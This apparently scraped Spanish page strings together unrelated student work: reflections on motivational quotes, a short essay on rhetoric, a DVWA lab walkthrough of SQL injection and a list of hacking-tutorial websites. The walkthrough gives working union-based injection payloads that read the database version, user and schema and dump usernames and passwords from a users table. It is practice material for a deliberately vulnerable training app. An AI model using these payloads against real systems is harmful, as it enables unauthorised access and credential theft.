#tarea2

Crema para pelo herbal essences

Audiolibros

 El siguiente fragmento le habla a los adolescentes invitándolos a no dejarse vencer y a seguir en la lucha que la vida les proporciona día a día. 

Hay varias frases las cuales me han llamado la atención y citaré a continuación:

“Tenemos que abrirnos al mundo. No considerar que el desastre está afuera, sino que arde como una fogata en el propio comedor de nuestras casas” Esta frase, a pesar de que la discutimos en clase, me parece importante volver a mencionarla ya que es importante que tomemos consciencia de la situación en la que estamos. No solo basta con saber qué es lo que sucede sino que es necesario que hagamos algo para cambiar esta realidad. Si algo no nos agrada debemos ser capaces de hacer un cambio. Si alguien necesita nuestra ayuda y nosotros podemos ser capaces de ayudarlo, debemos hacerlo. No solo debemos vivir en nuestra realidad sino que también tenemos que ser un poco mas empáticos con los demás y ver su realidad.

“La vida del mundo hay que tomarla como la tarea propia y salir a defenderla” Esta frase para mí se parece un poco a la anterior, ya que nos incita a que veamos la realidad de nuestro país, de la vida y salgamos a lucharla. No debemos esperar a que alguien más haga un cambio por nosotros, sino que debemos ser nosotros lo que empecemos con el cambio.

“Es una mentira pretender ser no violento y permanecer pasivo ante las injusticias sociales” - Gandhi

Esta frase me recordó a unos años atrás, cuando en Guatemala los guatemaltecos salimos a manifestar ya que no nos gustaba como nuestro gobierno estaba funcionando. Y es exactamente como todos deberíamos de ser, si algo no nos parece tenemos que se capaces de manifestarlo y no dejar que nadie nos opaque o nos diga como debemos vivir nuestra vida. 

Y por último, “sólo lo que se hace apasionadamente merece nuestro afán, lo demás no vale la pena” Esta pienso que cambió un poco el contexto en el que estábamos, ya que lo tomé como que tenemos que buscar en qué somos buenos en la vida y qué es lo que nos gusta y esforzarnos mucho para sobresalir en ese ámbito. Por ejemplo: mi carrera universitaria. Si yo considero que soy buena en esto y sé que puedo salir adelante con esta carrera, debo intentar sobresalir y dar el cien por ciento de mí. 

La función de la retórica va más allá de la comunicación que utilizamos en el día a día, su finalidad es persuadir al receptor más que comunicarle algo, busca convencerlo y hacerlo cambiar de parecer o de actitud, todo de forma previamente calculada. Los orígenes de la retórica se remontan a hace más de dos mil años en la antigua Grecia, donde se podemos hacernos de una clara idea de su importancia y poder portar un papel primordial en cuestiones como el comercio, la economía y la política.

Para que sea efectiva, la retórica debe consistir de argumentos creíbles, verosímiles que convenzan y guíen al público en el sentido que se desee, sin embargo estos argumentos no siempre se fundamentan de lo racional. Puesto que la retórica busca persuadir más que informar esta crea impacto en sus mensajes al disfrazarlos o adornarlos para así aparentar cierta novedad que atraiga la atención de los receptores. Es aquí donde entran figuras retoricas como la metáfora, la antítesis, la hipérbole y la metonimia que ayudan a darle notoriedad a nuestros mensajes.

La inyección SQL hace referencia a usar las técnicas de SQL para obtener información sobre la estructura de una base de datos.

Para esto, se va a utilizar una máquina virtual del cual servirá para poder efectuar las sentencias SQL y así poder realizar la práctica.

Se descargó la máquina virtual y se configuro la manera de acceder a ella mediante una IP.

La configuración que se hace en la máquina virtual es únicamente la opción de red de la misma, se ubicó la opción de Adaptador 1 à Conectado a: Adaptador Puente ==> Se selecciona el de Wifi (en mi caso). 

Luego de ello, se inicia la máquina virtual, en donde al momento de ya culmine la inicialización, mostrara en la ventana lo siguiente:

Dicha dirección ip que se muestra, se la utiliza en un navegador quedando de la siguiente manera (http://direccionIP/login.php):

Para acceder se debe logear, para ello, el usuario es admin y la contraseña password.

Se abre la siguiente ventana, en donde nos da la bienvenida, para la práctica, se ubicara la seguridad en LOW en el apartado de DVWA Security.

Después de aquello, nos ubicaremos en el apartado de SQL Injection, mostrándonos una ventana como esta:

Se empieza con los comandos necesarios, como ejemplo:

Inyección básica:

          o   Ingresamos “1” en el textbox y se clic en el botón, en donde mostrara                 como resultado el registro cuyo campo id tenga dicho valor.

          o   El PHP coge dicho valor y ejecuta lo siguiente: $getid = "SELECT                      first_name, last_name FROM users WHERE user_id = '$id'";

Siempre en un escenario:

          o   Se ingresa en la caja de texto lo siguiente: %' or '0'='0  y se da clic en                el botón.

          o   En este escenario, estamos diciendo que la sentencia, todos los                        registros son falsos y que todos los registros son ciertas.

               - %' ==> Probablemente no será igual a cualquier cosa, y será falsa.                  - '0'='0'  à Es igual a verdad, porque siempre será igual a 0 0.

Inyección SQL para conocer la versión de la base de datos.

         o   Se escribe la siguiente sentencia SQL para poder obtener la                             información de la versión: %' or 0=0 union select null, version()#.

         o   A continuación se muestra en donde se indica la versión de la base                   de datos.

Mostrar el usuario de la base de datos.

          o   Para poder mostrar el usuario de la base de datos, se escribe la                        siguiente sentencia: %' or 0=0 union select null, user() #

          o   A continuación, se muestra el usuario:

Mostrar el nombre de la base de datos.

           o   Ingresar la siguiente sentencia para poder obtener dicha                                   información: %' or 0=0 union select null, database() #

           o   A continuación se muestra el nombre de la base de datos al                               momento de ejecutar la sentencia.

Mostrar todas las tablas de Information_schema.

          o   Se escribe la siguiente sentencia para mostrar todas las tablas de la                  base de datos: %' and 1=0 union select null, table_name from                      information_schema.tables #.

          o   A continuación se muestra el resultado de haber ejecutado la                           sentencia.

Mostrar todos los usuarios de las tablas de la Information_schema.

          o   Mediante la siguiente sentencia se muestran los usuarios de las                        tablas: %' and 1=0 union select null, table_name from                                        information_schema.tables where table_name like 'user%'#.

         o   A continuación se muestra el resultado de haber ejecutado dicha                       sentencia.

Mostrar todos los campos de la tabla usuario.

          o   Mediante la siguiente sentencia, se obtiene información sobre los                      campos de la tabla usuario de la base de datos: %' and 1=0 union                    select null, concat(table_name,0x0a,column_name) from                            information_schema.columns where table_name = 'users' #.

          o   A continuación se muestra el resultado de ejecutar dicha sentencia.

Mostrar el contenido de todas las columnas de la tabla usuario.

          o   Mediante el siguiente comando, se mostrara el contenido de las                        columnas, es decir los registros de la tabla usuario: %' and 1=0 union                select null,                                                                                               concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

          o   A continuación se presenta el resultado de ejecutar dicha sentencia.

1.       El sitio web http://www.aprendeahackear.com/index.html aunque su apariencia no es tan agradable, porque a primera vista da una sensación de que algo va mal con el sitio, en el sentido de que se asume que nuestra computadora corre el riesgo de infectarse por algún malware o algo por el estilo, pero los recursos que ofrece, e incluso, un curso gratuito de hackeo, hacen que sea uno de los sitios web elegidos por mi persona, los diferentes programas o software que recomienda, los manuales que pone a disposición, videos tutoriales  específicos entre otras opciones hacen de este sitio web un bueno aporte para poder aprender a hackear.

2.       El siguiente sitio es un blog (http://blog.underc0de.org/) en donde ofrece una gran gama de publicaciones en donde explican de manera muy detallada las diferentes desventajas, problemas, inconvenientes, entre otros sobre lo que son los delitos informáticos, además de cómo poder superar y protegernos de ello, por esta razón este sitio web me agrado muchísimo y los comparto.

3.       El siguiente es https://plus.google.com/u/0/communities/115044748041105375626 COMPUTER HACKING TIPS AND TRICKS a pesar de ser una comunidad de google+ en Ingles, ofrece una serie de recursos en ambos idiomas, muchas personas recomiendan libros, paginas, servicios, manuales, videos, software entre otros, en las cuales, las personas que visitan esa comunidad queda maravillado por las recursos además de las recomendaciones y opiniones sobre publicaciones que realizan las personas.